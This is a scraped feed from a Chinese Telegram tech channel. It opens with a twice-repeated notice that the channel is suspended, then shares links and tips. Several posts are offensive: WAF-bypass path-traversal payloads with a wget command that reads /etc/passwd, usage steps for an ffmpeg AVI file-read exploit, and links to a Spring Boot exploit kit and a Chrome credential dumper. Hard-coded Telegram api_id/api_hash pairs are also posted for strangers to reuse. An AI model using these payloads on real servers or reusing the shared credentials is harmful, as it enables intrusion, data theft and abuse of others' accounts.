关于堆栈 (@libstack) 频道停更的公告
各位一直关注频道的朋友:
你们好。遗憾地告知,即日起 @libstack 将进入无限期停更状态。
从创建频道至今的三年多里,我始终希望通过这里分享技术见解和实用资源,也很感激每一位订阅者的关注——无论是默默潜水的朋友,还是常留言互动的伙伴,你们的存在让这个空间有了意义。但近期随着个人工作重心的重大调整,日常事务已占据几乎频道猪全部精力,加上对内容质量的执念,实在难以兼顾频道的持续更新。
停更决定并非轻率做出。过去几个月里,频道内碎片化的输出既违背了创立频道时“深度分享”的初衷,也无法保证对读者的价值。与其勉强维持低质更新,不如暂时按下暂停键,对自己和关注者都更负责。虽然暂时告别,或许未来某个时刻,当状态更加成熟、内容更有沉淀时,我们会以更好的形式重逢。
即日起,频道现有内容仍会保留,如需过往资料可随时查阅。若有重大事项本频道仍会临时启用。频道附属讨论组 (@c0mm1nt) 不受影响。
最后,衷心说一声谢谢。谢谢你们曾在这里停留,谢谢你们给予的包容与鼓励。江湖路远,我们各自珍重。
libstack
2025 年 5 月 11 日
各位一直关注频道的朋友:
你们好。遗憾地告知,即日起 @libstack 将进入无限期停更状态。
从创建频道至今的三年多里,我始终希望通过这里分享技术见解和实用资源,也很感激每一位订阅者的关注——无论是默默潜水的朋友,还是常留言互动的伙伴,你们的存在让这个空间有了意义。但近期随着个人工作重心的重大调整,日常事务已占据几乎频道猪全部精力,加上对内容质量的执念,实在难以兼顾频道的持续更新。
停更决定并非轻率做出。过去几个月里,频道内碎片化的输出既违背了创立频道时“深度分享”的初衷,也无法保证对读者的价值。与其勉强维持低质更新,不如暂时按下暂停键,对自己和关注者都更负责。虽然暂时告别,或许未来某个时刻,当状态更加成熟、内容更有沉淀时,我们会以更好的形式重逢。
即日起,频道现有内容仍会保留,如需过往资料可随时查阅。若有重大事项本频道仍会临时启用。频道附属讨论组 (@c0mm1nt) 不受影响。
最后,衷心说一声谢谢。谢谢你们曾在这里停留,谢谢你们给予的包容与鼓励。江湖路远,我们各自珍重。
libstack
2025 年 5 月 11 日
😭21❤5❤🔥1
一款旨在将像素对齐到网格上的工具,用于修复人工智能生成的杂乱的像素作品
https://github.com/Hugo-Dz/spritefusion-pixel-snapper
https://github.com/Hugo-Dz/spritefusion-pixel-snapper
Cloudflare 错误页面生成器,能够创建模仿 Cloudflare 错误页面的自定义错误页面,并且可以将其嵌入到自己的网站中。
https://github.com/donlon/cloudflare-error-page
https://github.com/donlon/cloudflare-error-page
waf 穿透提示:
如果你知道存在的文件夹(例如通过查看网页源代码找到的资源路径),可以将其作为起点:
如果图片路径是 /static/img/logo.png,Payload 可能是:
https://替换/static/img//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
很多简易的防火墙(WAF)或代码会检查输入中是否包含 ../。如果攻击者写成 ....//,一些写得不好的过滤器可能会检测 ../ ,没发现(因为中间多了点)。waf 执行清理逻辑:把所有的 // 替换成 /,目的是为了规范化 URL,waf 执行递归清理,也就是把 .. 删掉,结果剩下的部分又组合成了新的 ../
或者是路径规范化漏洞,有些后端程序在接收到 ....// 时,会先进行一次非标准的字符串处理,将其误判为两个连续的跳转请求,或者将其修剪成了操作系统最终能识别的 ../
wget https://替换/....//....//....//....//....//....//....///....//....//....//....//....//....//....//etc/passwd -k如果你知道存在的文件夹(例如通过查看网页源代码找到的资源路径),可以将其作为起点:
如果图片路径是 /static/img/logo.png,Payload 可能是:
https://替换/static/img//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
很多简易的防火墙(WAF)或代码会检查输入中是否包含 ../。如果攻击者写成 ....//,一些写得不好的过滤器可能会检测 ../ ,没发现(因为中间多了点)。waf 执行清理逻辑:把所有的 // 替换成 /,目的是为了规范化 URL,waf 执行递归清理,也就是把 .. 删掉,结果剩下的部分又组合成了新的 ../
或者是路径规范化漏洞,有些后端程序在接收到 ....// 时,会先进行一次非标准的字符串处理,将其误判为两个连续的跳转请求,或者将其修剪成了操作系统最终能识别的 ../
Forwarded from Eternal_安全内参
https://github.com/LandGrey/SpringBootVulExploit
SpringBoot攻防全解
SpringBoot攻防全解
GitHub
GitHub - LandGrey/SpringBootVulExploit: SpringBoot 相关漏洞学习资料,利用方法和技巧合集,黑盒安全评估 check list
SpringBoot 相关漏洞学习资料,利用方法和技巧合集,黑盒安全评估 check list. Contribute to LandGrey/SpringBootVulExploit development by creating an account on GitHub.
https://github.com/Maldev-Academy/DumpChromeSecrets
从现代 Chrome 版本中提取数据,包括刷新令牌、cookie、保存的凭据、自动填充数据、浏览历史记录和书签。
从现代 Chrome 版本中提取数据,包括刷新令牌、cookie、保存的凭据、自动填充数据、浏览历史记录和书签。
GitHub
GitHub - Maldev-Academy/DumpChromeSecrets: Extract data from modern Chrome versions, including refresh tokens, cookies, saved credentials…
Extract data from modern Chrome versions, including refresh tokens, cookies, saved credentials, autofill data, browsing history, and bookmarks - Maldev-Academy/DumpChromeSecrets
* Security: api\_id/api\_hash are hard-coded (api_id = 20227969, api_hash = 3fc5e726fcc1160a81704958b2243109); mitigate with rate limits/rotation if abused.
API_ID=25496841
API_HASH=d7ed3ebb8f4323c37c5ffcac40e677d4
BOT_TOKEN=
TG_API_ID="20559113" \
TG_API_HASH="ed8e97b3a73a324f5cf0b6dae63239b2"
供开发者们使用的 Telegram api id 和 hash,不能申请 api 的用户可以尝试下
Forwarded from bupt.moe
bupt.moe
#security 大开眼界,还有这些玩法的? https://zhuanlan.zhihu.com/p/1926774979476825233
利用方法
https://github.com/neex/ffmpeg-avi-m3u-xbin/blob/master/gen_xbin_avi.py
./gen_xbin_avi.py file://<filename> file_read.avi
Upload file_read.avi to some website that processes videofiles
(on server side, done by the videoservice) ffmpeg -i file_read.avi output.mp4
Click "Play" in the videoservice.
If you are lucky, you'll the content of <filename> from the server.
这个脚本有点老如果要用可能还需要放一个 ffmpeg2.x 的受影响 elf
https://github.com/neex/ffmpeg-avi-m3u-xbin/blob/master/gen_xbin_avi.py
./gen_xbin_avi.py file://<filename> file_read.avi
Upload file_read.avi to some website that processes videofiles
(on server side, done by the videoservice) ffmpeg -i file_read.avi output.mp4
Click "Play" in the videoservice.
If you are lucky, you'll the content of <filename> from the server.
这个脚本有点老如果要用可能还需要放一个 ffmpeg2.x 的受影响 elf
GitHub
ffmpeg-avi-m3u-xbin/gen_xbin_avi.py at master · neex/ffmpeg-avi-m3u-xbin
Contribute to neex/ffmpeg-avi-m3u-xbin development by creating an account on GitHub.
❤1
https://github.com/666ghj/MiroFish
MiroFish 是一款基于多智能体技术的新一代 AI 预测引擎。通过提取现实世界的种子信息(如突发新闻、政策草案、金融信号),自动构建出高保真的平行数字世界。在此空间内,成千上万个具备独立人格、长期记忆与行为逻辑的智能体进行自由交互与社会演化。你可透过「上帝视角」动态注入变量,精准推演未来走向
你只需:上传种子材料(数据分析报告或者有趣的小说故事),并用自然语言描述预测需求
MiroFish 将返回:一份详尽的预测报告,以及一个可深度交互的高保真数字世界
MiroFish 是一款基于多智能体技术的新一代 AI 预测引擎。通过提取现实世界的种子信息(如突发新闻、政策草案、金融信号),自动构建出高保真的平行数字世界。在此空间内,成千上万个具备独立人格、长期记忆与行为逻辑的智能体进行自由交互与社会演化。你可透过「上帝视角」动态注入变量,精准推演未来走向
你只需:上传种子材料(数据分析报告或者有趣的小说故事),并用自然语言描述预测需求
MiroFish 将返回:一份详尽的预测报告,以及一个可深度交互的高保真数字世界
GitHub
GitHub - 666ghj/MiroFish: A Simple and Universal Swarm Intelligence Engine, Predicting Anything. 简洁通用的群体智能引擎,预测万物
A Simple and Universal Swarm Intelligence Engine, Predicting Anything. 简洁通用的群体智能引擎,预测万物 - 666ghj/MiroFish
Forwarded from Dejavu's Clips
theme.typora.io
Phycat-color
Phycat theme for Typora 好看的样式可以提升写作体验。 起源是想找一款层次分明、易于阅读的主题,于是借鉴了Typora、Mdnice、思源笔记等平台的优秀主题,自己尝试写了一些样式,在Typora主题社区第一次发布了Phycat这个主题。我知道这个主题还不是很成熟,不过也收获了不少用户的喜爱。 不少用户提了很多建议,让我进行了很多的主题优化。我不是专业的前端人员,好在AI时代下很多问题都变得简单起来,现在Phycat2.0主题来了! 主题系列 主题链接 亮色主题 Cheey(樱桃红…
看看你们的 IRC 注册时间👀
/msg NickServ info 你的 nickname ALLNickServ: Registered : Apr 10 13:12:20 2022 +0000 (3y 40w 4d ago)
[09:23] NickServ: Last addr : ~OutlinedA@user/OutlinedArc217
[09:23] NickServ: vHost : user/OutlinedArc217 (assigned on Jul 22 02:09:37 2022 +0000 (3y 25w 6d ago))